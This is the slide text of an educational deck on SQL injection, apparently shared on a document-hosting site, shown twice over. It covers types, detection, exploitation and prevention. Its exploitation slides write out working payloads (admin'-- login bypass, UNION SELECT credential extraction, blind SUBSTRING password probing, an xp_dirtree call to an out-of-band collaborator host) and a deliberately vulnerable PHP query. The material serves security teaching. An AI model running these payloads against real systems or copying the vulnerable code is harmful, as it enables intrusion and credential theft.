KEMBAR78
SQL Injection Attack Guide for ethical hacking | PDF
Ayan Live Rourkela, profile picture
Uploaded byAyan Live Rourkela
PDF, PPTX82 views

SQL Injection Attack Guide for ethical hacking

The document outlines SQL injection (SQLi) as a vulnerability allowing attackers to interfere with SQL queries, leading to unauthorized access, data alteration, and potential remote code execution. It details various types of SQLi, including in-band and inferential attacks, and methods to exploit these vulnerabilities, alongside preventive measures such as using prepared statements and input validation. Resources for further reading and tools for SQLi testing and prevention are also provided.

Download as PDF, PPTX
SQL INJECTION TRUE FALSE
Agenda WHAT IS SQL INJECTION? HOW DO YOU FIND IT? HOW DO YOU EXPLOIT IT? HOW DO YOU PREVENT IT?
WHAT IS SQL INJECTION?
SQL Injection • Vulnerability that consists of an attacker interfering with the SQL queries that an application makes to a database. Attacker Web Server Database admin'-- select * from users where username = 'admin'--' and password = ''; Username Password
SQL Injection • Vulnerability that consists of an attacker interfering with the SQL queries that an application makes to a database. Attacker Web Server Database admin'-- select * from users where username = 'admin' Return the admin user profile Attacker gets logged in as the admin user Username Password
Impact of SQL Injection Attacks • Unauthorized access to sensitive data • Confidentiality – SQLi can be used to view sensitive information, such as application usernames and passwords • Integrity – SQLi can be used to alter data in the database • Availability – SQLi can be used to delete data in the database • Remote code execution on the operating system
OWASP Top 10 OWASP Top 10 - 2010 OWASP Top 10 - 2013 OWASP Top 10 - 2017 A1 – Injection A1 – Injection A1 – Injection A2 – Cross Site Scripting (XSS) A2 – Broken Authentication and Session Management A2 – Broken Authentication A3 – Broken Authentication and Session Management A3 – Cross-Site Scripting (XSS) A3 – Sensitive Data Exposure A4 – Insecure Direct Object References A4 – Insecure Direct Object References [Merged+A7] A4 – XML External Entities (XXE) [NEW] A5 – Cross Site Request Forgery (CSRF) A5 – Security Misconfiguration A5 – Broken Access Control [Merged] A6 – Security Misconfiguration (NEW) A6 – Sensitive Data Exposure A6 – Security Misconfiguration A7 – Insecure Cryptographic Storage A7 – Missing Function Level Access Control [Merged+A4] A7 – Cross-Site Scripting (XSS) A8 – Failure to Restrict URL Access A8 – Cross-Site Request Forgery (CSRF) A8 – Insecure Deserialization [NEW, Community] A9 – Insufficient Transport Layer Protection A9 – Using Components with Known Vulnerabilities A9 – Using Components with Known Vulnerabilities A10 – Unvalidated Redirects and Forwards (NEW) A10 – Unvalidated Redirects and Forwards A10 – Insufficient Logging & Monitoring [NEW,Comm.]
Types of SQL Injection SQL Injection In-Band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
In-Band SQL Injection • In-band SQLi occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack • Retrieved data is presented directly in the application web page • Easier to exploit than other categories of SQLi • Two common types of in-band SQLi • Error-based SQLi • Union-based SQLi
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Error-Based SQLi • Error-based SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection. www.random.com/app.php?id=' Output: You have an error in your SQL sytax, check the manual that corresponds to your MySQL server version… • Example: Input:
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Union-Based SQLi • Union-based SQLI is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set • Example: Input: www.random.com/app.php?id=' UNION SELECT username, password FROM users-- Output: carlos afibh9cjnkuwcsfobs7h administrator tn8f921skp5dzoy7hxpk
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Inferential (Blind) SQL Injection • SQLi vulnerability where there is no actual transfer of data via the web application • Just as dangerous as in-band SQL injection • Attacker able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server. • Takes longer to exploit than in-band SQL injection • Two common types of blind SQLi • Boolean-based SQLi • Time-based SQLi
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Boolean-Based Blind SQLi • Boolean-based SQLi is a blind SQLi technique that uses Boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.
Boolean-Based Blind SQLi www.random.com/app.php?id=1 Example URL: Backend Query: select title from product where id =1 Payload #1 (False): www.random.com/app.php?id=1 and 1=2 Backend Query: select title from product where id =1 and 1=2 Payload #2 (True): www.random.com/app.php?id=1 and 1=1 Backend Query: select title from product where id =1 and 1=1
Boolean-Based Blind SQLi select title from product where id =1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's' Payload: Backend Query: Nothing is returned on the page Administrator / e3c33e889e0e1b62cb7f65c63b60c42bd77275d0e730432fc37b7e624b09ad1f Users Table: www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's' Returned False ‘s’ is NOT the first character of the hashed password Payload: www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'e' Backend Query: select title from product where id =1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'e' Title of product id 1 is returned on the page Returned True ‘e’ IS the first character of the hashed password
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Time-Based Blind SQLi • Time-based SQLi is a blind SQLi technique that relies on the database pausing for a specified amount of time, then returning the results, indicating a successful SQL query execution. • Example Query: If the first character of the administrator’s hashed password is an ‘a’, wait for 10 seconds. → response takes 10 seconds → first letter is ‘a’ → response doesn’t take 10 seconds → first letter is not ‘a’
Types of SQL Injection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
Out-of-Band (OAST) SQLi • Vulnerability that consists of triggering an out-of-band network connection to a system that you control. • Not common • A variety of protocols can be used (ex. DNS, HTTP) • Example Payload: '; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--
HOW TO FIND SQLI VULNERABILITIES?
Finding SQLi Vulnerabilities Depends on the perspective of testing. White Box Testing Black Box Testing <?php $offset = $argv[0]; // beware, no in put validation! $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;"; $result = pg_query($conn, $query); ?>
• Map the application • Fuzz the application • Submit SQL-specific characters such as ' or ", and look for errors or other anomalies • Submit Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's responses • Submit payloads designed to trigger time delays when executed within a SQL query, and look for differences in the time taken to respond • Submit OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitor for any resulting interactions Black-Box Testing Perspective
White-Box Testing Perspective <?php $offset = $argv[0]; // beware, no input validati on! $query = "SELECT id, name FROM products OR DER BY name LIMIT 20 OFFSET $offset;"; $result = pg_query($conn, $query); ?> • Enable web server logging • Enable database logging • Map the application • Visible functionality in the application • Regex search on all instances in the code that talk to the database • Code review! • Follow the code path for all input vectors • Test any potential SQLi vulnerabilities
HOW TO EXPLOIT SQLI VULNERABILITIES?
Exploiting Error-Based SQLi • Submit SQL-specific characters such as ' or ", and look for errors or other anomalies • Different characters can give you different errors
Exploiting Union-Based SQLi There are two rules for combining the result sets of two queries by using UNION: • The number and the order of the columns must be the same in all queries • The data types must be compatible Exploitation: • Figure out the number of columns that the query is making • Figure the data types of the columns (mainly interested in string data) • Use the UNION operator to output information from the database
Exploiting Union-Based SQLi Determining the number of columns required in an SQL injection UNION attack using ORDER BY: select title, cost from product where id =1 order by 1 • Incrementally inject a series of ORDER BY clauses until you get an error or observe a different behaviour in the application order by 1-- order by 2-- order by 3-- The ORDER BY position number 3 is out of range of the number of items in the select list.
Exploiting Union-Based SQLi Determining the number of columns required in an SQL injection UNION attack using NULL VALUES: select title, cost from product where id =1 UNION SELECT NULL-- • Incrementally inject a series of UNION SELECT payloads specifying a different number of null values until you no longer get an error ' UNION SELECT NULL-- All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. ' UNION SELECT NULL-- ' UNION SELECT NULL, NULL--
Exploiting Union-Based SQLi Finding columns with a useful data type in an SQL injection UNION attack: • Probe each column to test whether it can hold string data by submitting a series of UNION SELECT payloads that place a string value into each column in turn ' UNION SELECT 'a',NULL-- Conversion failed when converting the varchar value 'a' to data type int. ' UNION SELECT 'a',NULL-- ' UNION SELECT NULL,'a'--
Exploiting Union-Based SQLi There are two rules for combining the result sets of two queries by using UNION: • The number and the order of the columns must be the same in all queries • The data types must be compatible Exploitation: • Figure out the number of columns that the query is making • Figure the data types of the columns (mainly interested in string data) • Use the UNION operator to output information from the database
Exploiting Boolean-Based Blind SQLi • Submit a Boolean condition that evaluates to False and not the response • Submit a Boolean condition that evaluates to True and note the response • Write a program that uses conditional statements to ask the database a series of True / False questions and monitor response
Exploiting Time-Based Blind SQLi • Submit a payload that pauses the application for a specified period of time • Write a program that uses conditional statements to ask the database a series of TRUE / FALSE questions and monitor response time
Exploiting Out-of-Band SQLi • Submit OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitor for any resulting interactions • Depending on SQL injection use different methods to exfil data
Automated Exploitation Tools sqlmap https://github.com/sqlmapproje ct/sqlmap Web Application Vulnerability Scanners (WAVS)
HOW TO PREVENT SQLI VULNERABILITIES?
Preventing SQLi Vulnerabilities • Primary Defenses: • Option 1: Use of Prepared Statements (Parameterized Queries) • Option 2: Use of Stored Procedures (Partial) • Option 3: Whitelist Input Validation (Partial) • Option 4: Escaping All User Supplied Input (Partial) • Additional Defenses: • Also: Enforcing Least Privilege • Also: Performing Whitelist Input Validation as a Secondary Defense
Option 1 - Use of Prepared Statements Code vulnerable to SQLi: Spot the issue? • User supplied input “cutomerName” is embedded directly into the SQL statement
Option 1 – Use of Prepared Statements Code not vulnerable to SQLi: The construction of the SQL statement is performed in two steps: • The application specifies the query’s structure with placeholders for each user input • The application specifies the content of each placeholder
Partial Options Option 2: Use of Stored Procedures • A stored procedure is a batch of statements grouped together and stored in the database • Not always safe from SQL injection, still need to be called in a parameterized way Option 3: Whitelist Input Validation • Defining what values are authorized. Everything else is considered unauthorized • Useful for values that cannot be specified as parameter placeholders, such as the table name. Option 4: Escaping All User Supplied Input • Should be only used as a last resort
Additional Defenses Least Privilege • The application should use the lowest possible level of privileges when accessing the database • Any unnecessary default functionality in the database should be removed or disabled • Ensure CIS benchmark for the database in use is applied • All vendor-issued security patches should be applied in a timely fashion Whitelist Input Validation • Already discussed Defense in Depth
Resources • Web Security Academy - SQL Injection Ø https://portswigger.net/web-security/sql-injection • Web Application Hacker’s Handbook • Chapter 9 - Attacking Data Stores • OWASP – SQL Injection Ø https://owasp.org/www-community/attacks/SQL_Injection • OWASP – SQL Prevention Cheat Sheet Ø https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html • PentestMonkey – SQL Injection Ø http://pentestmonkey.net/category/cheat-sheet/sql-injection

More Related Content

PPTX
SQL Injection attack
byRayudu Babu
 
PPTX
SQL INJECTION
byMentorcs
 
PPTX
cybersecurity and sql injection for students
byVeenaShree20
 
PDF
Advanced SQL Injection Attack & Defenses
byTiago Mendo
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PDF
SQL injection exploitation internals
byBernardo Damele A. G.
 
SQL Injection attack
byRayudu Babu
 
SQL INJECTION
byMentorcs
 
cybersecurity and sql injection for students
byVeenaShree20
 
Advanced SQL Injection Attack & Defenses
byTiago Mendo
 
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
SQL injection exploitation internals
byBernardo Damele A. G.
 

Similar to SQL Injection Attack Guide for ethical hacking

PPTX
SQL injection implementation and prevention
byRejaul Islam Royel
 
PPTX
OWASP Top 10 - Day 1 - A1 injection attacks
byMohamed Talaat
 
PPTX
Sql injection
bySuraj Tiwari
 
PPT
A Brief Introduction in SQL Injection
bySina Manavi
 
PPT
Sql Injection
byLakshika Rasanjali
 
PDF
Advanced SQL Injection: Attacks
byNuno Loureiro
 
PPTX
Sql injection
byMehul Boghra
 
PDF
Ijcatr04041018
byEditor IJCATR
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PPTX
Hack through Injections
byNazar Tymoshyk, CEH, Ph.D.
 
PPSX
Web application security
bywww.netgains.org
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PDF
Sql injection
byBee_Ware
 
PPTX
SQL Injection.jpg.pptx
bydawitTerefe5
 
PPTX
SQL INJECTIONS.pptx
byJayeshYadav53
 
PPT
Sql injection
byNitish Kumar
 
PDF
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
PPTX
SQL injection
byAkash Panchal
 
PPTX
Sql injection
byIlan Mindel
 
PPTX
Sql Injection
byAju Thomas
 
SQL injection implementation and prevention
byRejaul Islam Royel
 
OWASP Top 10 - Day 1 - A1 injection attacks
byMohamed Talaat
 
Sql injection
bySuraj Tiwari
 
A Brief Introduction in SQL Injection
bySina Manavi
 
Sql Injection
byLakshika Rasanjali
 
Advanced SQL Injection: Attacks
byNuno Loureiro
 
Sql injection
byMehul Boghra
 
Ijcatr04041018
byEditor IJCATR
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
Hack through Injections
byNazar Tymoshyk, CEH, Ph.D.
 
Web application security
bywww.netgains.org
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
Sql injection
byBee_Ware
 
SQL Injection.jpg.pptx
bydawitTerefe5
 
SQL INJECTIONS.pptx
byJayeshYadav53
 
Sql injection
byNitish Kumar
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
SQL injection
byAkash Panchal
 
Sql injection
byIlan Mindel
 
Sql Injection
byAju Thomas
 

Recently uploaded

PDF
The Children’s Support Fund, set up to support the welfare and education of c...
bynservice241
 
PPTX
How to Create a Manifest File in Odoo 18
byCeline George
 
PPTX
Project Dashboard in Odoo 18 Project
byCeline George
 
PDF
BD1TL - TNTEU - Teaching and Learning - Unit - 2.pdf
byDr Raja Mohammed T
 
PPTX
English Home Language & First Additional Language P2 Preparation.pptx
byMasingita Maswanganye
 
PPTX
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
PDF
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
PDF
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
PDF
BUSINESS ETHICS – UNIT I: Introduction to Business Ethics
byD NANEE
 
PPTX
Common problems or challenges faced by Indian adolescents
byDr. Harpal Kaur
 
PPTX
Capital Budgeting - Risk Analysis Using Sensitivity Analysis
bySundar B N
 
PDF
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
PPTX
GAS chromatography ppt (Presentation) by Jatin Chauhan
byjatinchauhan1618
 
PPTX
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
PPTX
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
PDF
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 
PPTX
Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NISO Training ...
byNational Information Standards Organization (NISO)
 
PDF
Total Quality Management : A presentation by a third year student.
byMbalenhle Ndlovu
 
PPTX
How can education build trust in a polarised world_Jonathan James_OECD .pptx
byEduSkills OECD
 
PDF
1.1 Historical background & development of Profession of Pharmacy.pdf
byMr. SAKHARE R. S.
 
The Children’s Support Fund, set up to support the welfare and education of c...
bynservice241
 
How to Create a Manifest File in Odoo 18
byCeline George
 
Project Dashboard in Odoo 18 Project
byCeline George
 
BD1TL - TNTEU - Teaching and Learning - Unit - 2.pdf
byDr Raja Mohammed T
 
English Home Language & First Additional Language P2 Preparation.pptx
byMasingita Maswanganye
 
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
BUSINESS ETHICS – UNIT V: Ethical Insights from Thirukkural and Modern Thought
byD NANEE
 
BUSINESS ETHICS – UNIT I: Introduction to Business Ethics
byD NANEE
 
Common problems or challenges faced by Indian adolescents
byDr. Harpal Kaur
 
Capital Budgeting - Risk Analysis Using Sensitivity Analysis
bySundar B N
 
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
GAS chromatography ppt (Presentation) by Jatin Chauhan
byjatinchauhan1618
 
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
Agriculture Lesson Note for Grade 11 Chapter 3 & 4.pptx
byNajibMuhidin
 
History of Department of AIHC and Archaeology_BHU
byBanaras Hindu University
 
Hudson Vitale "AI Essentials: From Tools to Strategies: A 2025 NISO Training ...
byNational Information Standards Organization (NISO)
 
Total Quality Management : A presentation by a third year student.
byMbalenhle Ndlovu
 
How can education build trust in a polarised world_Jonathan James_OECD .pptx
byEduSkills OECD
 
1.1 Historical background & development of Profession of Pharmacy.pdf
byMr. SAKHARE R. S.
 

SQL Injection Attack Guide for ethical hacking

  • 1.
  • 2.
    Agenda WHAT IS SQL INJECTION? HOWDO YOU FIND IT? HOW DO YOU EXPLOIT IT? HOW DO YOU PREVENT IT?
  • 3.
  • 4.
    SQL Injection • Vulnerabilitythat consists of an attacker interfering with the SQL queries that an application makes to a database. Attacker Web Server Database admin'-- select * from users where username = 'admin'--' and password = ''; Username Password
  • 5.
    SQL Injection • Vulnerabilitythat consists of an attacker interfering with the SQL queries that an application makes to a database. Attacker Web Server Database admin'-- select * from users where username = 'admin' Return the admin user profile Attacker gets logged in as the admin user Username Password
  • 6.
    Impact of SQLInjection Attacks • Unauthorized access to sensitive data • Confidentiality – SQLi can be used to view sensitive information, such as application usernames and passwords • Integrity – SQLi can be used to alter data in the database • Availability – SQLi can be used to delete data in the database • Remote code execution on the operating system
  • 7.
    OWASP Top 10 OWASPTop 10 - 2010 OWASP Top 10 - 2013 OWASP Top 10 - 2017 A1 – Injection A1 – Injection A1 – Injection A2 – Cross Site Scripting (XSS) A2 – Broken Authentication and Session Management A2 – Broken Authentication A3 – Broken Authentication and Session Management A3 – Cross-Site Scripting (XSS) A3 – Sensitive Data Exposure A4 – Insecure Direct Object References A4 – Insecure Direct Object References [Merged+A7] A4 – XML External Entities (XXE) [NEW] A5 – Cross Site Request Forgery (CSRF) A5 – Security Misconfiguration A5 – Broken Access Control [Merged] A6 – Security Misconfiguration (NEW) A6 – Sensitive Data Exposure A6 – Security Misconfiguration A7 – Insecure Cryptographic Storage A7 – Missing Function Level Access Control [Merged+A4] A7 – Cross-Site Scripting (XSS) A8 – Failure to Restrict URL Access A8 – Cross-Site Request Forgery (CSRF) A8 – Insecure Deserialization [NEW, Community] A9 – Insufficient Transport Layer Protection A9 – Using Components with Known Vulnerabilities A9 – Using Components with Known Vulnerabilities A10 – Unvalidated Redirects and Forwards (NEW) A10 – Unvalidated Redirects and Forwards A10 – Insufficient Logging & Monitoring [NEW,Comm.]
  • 8.
    Types of SQLInjection SQL Injection In-Band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 9.
    In-Band SQL Injection •In-band SQLi occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack • Retrieved data is presented directly in the application web page • Easier to exploit than other categories of SQLi • Two common types of in-band SQLi • Error-based SQLi • Union-based SQLi
  • 10.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 11.
    Error-Based SQLi • Error-basedSQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection. www.random.com/app.php?id=' Output: You have an error in your SQL sytax, check the manual that corresponds to your MySQL server version… • Example: Input:
  • 12.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 13.
    Union-Based SQLi • Union-basedSQLI is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set • Example: Input: www.random.com/app.php?id=' UNION SELECT username, password FROM users-- Output: carlos afibh9cjnkuwcsfobs7h administrator tn8f921skp5dzoy7hxpk
  • 14.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 15.
    Inferential (Blind) SQLInjection • SQLi vulnerability where there is no actual transfer of data via the web application • Just as dangerous as in-band SQL injection • Attacker able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server. • Takes longer to exploit than in-band SQL injection • Two common types of blind SQLi • Boolean-based SQLi • Time-based SQLi
  • 16.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 17.
    Boolean-Based Blind SQLi •Boolean-based SQLi is a blind SQLi technique that uses Boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.
  • 18.
    Boolean-Based Blind SQLi www.random.com/app.php?id=1 ExampleURL: Backend Query: select title from product where id =1 Payload #1 (False): www.random.com/app.php?id=1 and 1=2 Backend Query: select title from product where id =1 and 1=2 Payload #2 (True): www.random.com/app.php?id=1 and 1=1 Backend Query: select title from product where id =1 and 1=1
  • 19.
    Boolean-Based Blind SQLi selecttitle from product where id =1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's' Payload: Backend Query: Nothing is returned on the page Administrator / e3c33e889e0e1b62cb7f65c63b60c42bd77275d0e730432fc37b7e624b09ad1f Users Table: www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's' Returned False ‘s’ is NOT the first character of the hashed password Payload: www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'e' Backend Query: select title from product where id =1 and SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'e' Title of product id 1 is returned on the page Returned True ‘e’ IS the first character of the hashed password
  • 20.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 21.
    Time-Based Blind SQLi •Time-based SQLi is a blind SQLi technique that relies on the database pausing for a specified amount of time, then returning the results, indicating a successful SQL query execution. • Example Query: If the first character of the administrator’s hashed password is an ‘a’, wait for 10 seconds. → response takes 10 seconds → first letter is ‘a’ → response doesn’t take 10 seconds → first letter is not ‘a’
  • 22.
    Types of SQLInjection SQL Injection In-band (Classic) Inferential (Blind) Out-of-Band Error Union Boolean Time
  • 23.
    Out-of-Band (OAST) SQLi •Vulnerability that consists of triggering an out-of-band network connection to a system that you control. • Not common • A variety of protocols can be used (ex. DNS, HTTP) • Example Payload: '; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--
  • 24.
    HOW TO FINDSQLI VULNERABILITIES?
  • 25.
    Finding SQLi Vulnerabilities Dependson the perspective of testing. White Box Testing Black Box Testing <?php $offset = $argv[0]; // beware, no in put validation! $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;"; $result = pg_query($conn, $query); ?>
  • 26.
    • Map theapplication • Fuzz the application • Submit SQL-specific characters such as ' or ", and look for errors or other anomalies • Submit Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's responses • Submit payloads designed to trigger time delays when executed within a SQL query, and look for differences in the time taken to respond • Submit OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitor for any resulting interactions Black-Box Testing Perspective
  • 27.
    White-Box Testing Perspective <?php $offset= $argv[0]; // beware, no input validati on! $query = "SELECT id, name FROM products OR DER BY name LIMIT 20 OFFSET $offset;"; $result = pg_query($conn, $query); ?> • Enable web server logging • Enable database logging • Map the application • Visible functionality in the application • Regex search on all instances in the code that talk to the database • Code review! • Follow the code path for all input vectors • Test any potential SQLi vulnerabilities
  • 28.
    HOW TO EXPLOITSQLI VULNERABILITIES?
  • 29.
    Exploiting Error-Based SQLi •Submit SQL-specific characters such as ' or ", and look for errors or other anomalies • Different characters can give you different errors
  • 30.
    Exploiting Union-Based SQLi Thereare two rules for combining the result sets of two queries by using UNION: • The number and the order of the columns must be the same in all queries • The data types must be compatible Exploitation: • Figure out the number of columns that the query is making • Figure the data types of the columns (mainly interested in string data) • Use the UNION operator to output information from the database
  • 31.
    Exploiting Union-Based SQLi Determiningthe number of columns required in an SQL injection UNION attack using ORDER BY: select title, cost from product where id =1 order by 1 • Incrementally inject a series of ORDER BY clauses until you get an error or observe a different behaviour in the application order by 1-- order by 2-- order by 3-- The ORDER BY position number 3 is out of range of the number of items in the select list.
  • 32.
    Exploiting Union-Based SQLi Determiningthe number of columns required in an SQL injection UNION attack using NULL VALUES: select title, cost from product where id =1 UNION SELECT NULL-- • Incrementally inject a series of UNION SELECT payloads specifying a different number of null values until you no longer get an error ' UNION SELECT NULL-- All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. ' UNION SELECT NULL-- ' UNION SELECT NULL, NULL--
  • 33.
    Exploiting Union-Based SQLi Findingcolumns with a useful data type in an SQL injection UNION attack: • Probe each column to test whether it can hold string data by submitting a series of UNION SELECT payloads that place a string value into each column in turn ' UNION SELECT 'a',NULL-- Conversion failed when converting the varchar value 'a' to data type int. ' UNION SELECT 'a',NULL-- ' UNION SELECT NULL,'a'--
  • 34.
    Exploiting Union-Based SQLi Thereare two rules for combining the result sets of two queries by using UNION: • The number and the order of the columns must be the same in all queries • The data types must be compatible Exploitation: • Figure out the number of columns that the query is making • Figure the data types of the columns (mainly interested in string data) • Use the UNION operator to output information from the database
  • 35.
    Exploiting Boolean-Based BlindSQLi • Submit a Boolean condition that evaluates to False and not the response • Submit a Boolean condition that evaluates to True and note the response • Write a program that uses conditional statements to ask the database a series of True / False questions and monitor response
  • 36.
    Exploiting Time-Based BlindSQLi • Submit a payload that pauses the application for a specified period of time • Write a program that uses conditional statements to ask the database a series of TRUE / FALSE questions and monitor response time
  • 37.
    Exploiting Out-of-Band SQLi •Submit OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitor for any resulting interactions • Depending on SQL injection use different methods to exfil data
  • 38.
  • 39.
    HOW TO PREVENTSQLI VULNERABILITIES?
  • 40.
    Preventing SQLi Vulnerabilities •Primary Defenses: • Option 1: Use of Prepared Statements (Parameterized Queries) • Option 2: Use of Stored Procedures (Partial) • Option 3: Whitelist Input Validation (Partial) • Option 4: Escaping All User Supplied Input (Partial) • Additional Defenses: • Also: Enforcing Least Privilege • Also: Performing Whitelist Input Validation as a Secondary Defense
  • 41.
    Option 1 -Use of Prepared Statements Code vulnerable to SQLi: Spot the issue? • User supplied input “cutomerName” is embedded directly into the SQL statement
  • 42.
    Option 1 –Use of Prepared Statements Code not vulnerable to SQLi: The construction of the SQL statement is performed in two steps: • The application specifies the query’s structure with placeholders for each user input • The application specifies the content of each placeholder
  • 43.
    Partial Options Option 2:Use of Stored Procedures • A stored procedure is a batch of statements grouped together and stored in the database • Not always safe from SQL injection, still need to be called in a parameterized way Option 3: Whitelist Input Validation • Defining what values are authorized. Everything else is considered unauthorized • Useful for values that cannot be specified as parameter placeholders, such as the table name. Option 4: Escaping All User Supplied Input • Should be only used as a last resort
  • 44.
    Additional Defenses Least Privilege •The application should use the lowest possible level of privileges when accessing the database • Any unnecessary default functionality in the database should be removed or disabled • Ensure CIS benchmark for the database in use is applied • All vendor-issued security patches should be applied in a timely fashion Whitelist Input Validation • Already discussed Defense in Depth
  • 45.
    Resources • Web SecurityAcademy - SQL Injection Ø https://portswigger.net/web-security/sql-injection • Web Application Hacker’s Handbook • Chapter 9 - Attacking Data Stores • OWASP – SQL Injection Ø https://owasp.org/www-community/attacks/SQL_Injection • OWASP – SQL Prevention Cheat Sheet Ø https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html • PentestMonkey – SQL Injection Ø http://pentestmonkey.net/category/cheat-sheet/sql-injection